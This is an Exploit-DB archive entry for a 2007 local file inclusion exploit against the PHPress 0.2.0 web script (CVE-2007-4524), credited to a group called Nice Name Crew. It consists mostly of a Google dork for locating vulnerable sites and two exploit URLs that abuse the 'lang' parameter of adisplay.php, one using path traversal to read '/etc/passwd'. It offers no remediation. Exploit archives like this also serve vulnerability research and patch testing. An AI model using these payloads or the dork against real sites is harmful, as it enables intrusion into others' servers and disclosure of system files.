PHPress 0.2.0 - 'adisplay.php?lang' Local File Inclusion
Author: Nice Name Crew
type: webapps
platform: php
port:
date_added: 2007-09-07
date_updated: 2016-10-12
verified: 1
codes: CVE-2007-4524
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comphpress-0.2.0.tar.gz
:::::::::::::::::::::::::::::::::::::::::::::::::::.......................
::| \ | (_) | \ | | / ____|
::| \| |_ ___ ___ | \| | __ _ _ __ ___ ___ | | _ __ _____ __
::| . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | | | '__/ _ \ \ /\ / /
::| |\ | | (_| __/ | |\ | (_| | | | | | | __/ | |____| | | __/\ V V /
::|_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___| \_____|_| \___| \_/\_/
:::::::::::::::::::::::::::::We got the nicest name in the security scene!
::::::::Info::.
::Script: phpress
::Version: 0.2.0
::Homepage:http://sourceforge.net/projects/phpress/
::
:::::::::Details::.
::Type: Local_File_Inclusion
::Dork: allinurl:/phpress/
::Exploit: http://host/phpress/adisplay.php?lang=shell
::Exploit: http://host/phpress/adisplay.php?lang=../../etc/passwd
::
::Variable lang is not defined
::
::::::::::::::::::::::::::::::::.
:::::::::::Additional_Information::.
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
::Contact: naxx@chilloutzone.eu
::Website: none yet
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
# milw0rm.com [2007-09-08]